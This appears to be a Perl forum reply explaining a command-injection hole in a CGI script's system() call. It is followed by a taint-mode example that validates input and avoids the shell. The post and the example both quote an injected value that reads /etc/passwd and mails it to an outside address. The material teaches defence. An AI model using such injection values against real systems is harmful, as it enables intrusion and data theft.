system("perl prn_to_file.pl $param1 > ../results/output.txt");

So if I visit your website, and my name happens to be: "; cat /etc/passwd | mail foo@bar.com ;" - what do you think will happen?

Possibly nothing, if your webuser doesn't have sufficient privileges - but I'm sure you get the idea. Calling the single-argument form of system from within a CGI script, and using data that hasn't been taint-checked, is pretty much like putting a sign up saying "Here I am - come and own me".

I think you're going about this the wrong way. Firstly, if you're going to be accepting data from the outside world (i.e. your users), enable taint checking and validate your input. merlyn has a very good article that covers this.

Secondly, why bother calling an external script in the first place? What's wrong with simply writing to the output file from within the same script?


In reply to Re: Failed System/Exec Call under Right Permission with CGI by McDarren
in thread Failed System/Exec Call under Right Permission with CGI by neversaint
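
The two recommendations in the reply above (validate the input under taint mode, and keep the shell out of the call), as an added example that is not part of the original post. The interpreter path, the output.txt stand-in for ../results/output.txt, the one-line child standing in for prn_to_file.pl, and the names clean_name and run_and_save are assumptions made for illustration.

```perl
#!/usr/bin/perl -T
# Added example, not code from the thread. Run as: perl -T example.pl
use strict;
use warnings;

# Taint mode refuses to start a child process until the environment is known-safe.
$ENV{PATH} = '/usr/bin:/bin';
delete @ENV{qw(IFS CDPATH ENV BASH_ENV)};

my $PERL     = '/usr/bin/perl';   # assumed interpreter location
my $OUT_FILE = 'output.txt';      # stand-in for ../results/output.txt
# Stand-in for prn_to_file.pl: prints its first argument.
my @CHILD    = ($PERL, '-e', 'print "name=$ARGV[0]\n"');

# Allow-list validation; returning the regex capture is also what untaints the value.
sub clean_name {
    my ($raw) = @_;
    return unless defined $raw;
    return $raw =~ /\A([A-Za-z0-9_.-]{1,64})\z/ ? $1 : undef;
}

# Run the child with an argument list (no shell) and write its output from Perl,
# so no "> file" redirection ever has to be parsed by /bin/sh.
sub run_and_save {
    my ($name) = @_;
    open(my $child, '-|', @CHILD, $name) or die "cannot start child: $!";
    open(my $out, '>', $OUT_FILE)        or die "cannot write $OUT_FILE: $!";
    print {$out} $_ while <$child>;
    close($out)   or die "close $OUT_FILE: $!";
    close($child) or die "child failed, status $?";
    return 1;
}

# Constructed inputs: an ordinary name and the hostile value quoted in the post.
# In the CGI script the value would come from param() and arrive tainted.
for my $input ('alice', '; cat /etc/passwd | mail foo@bar.com ;') {
    my $name = clean_name($input);
    if (defined $name) {
        run_and_save($name);
        print "accepted: $name\n";
    } else {
        print "rejected: $input\n";
    }
}
```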
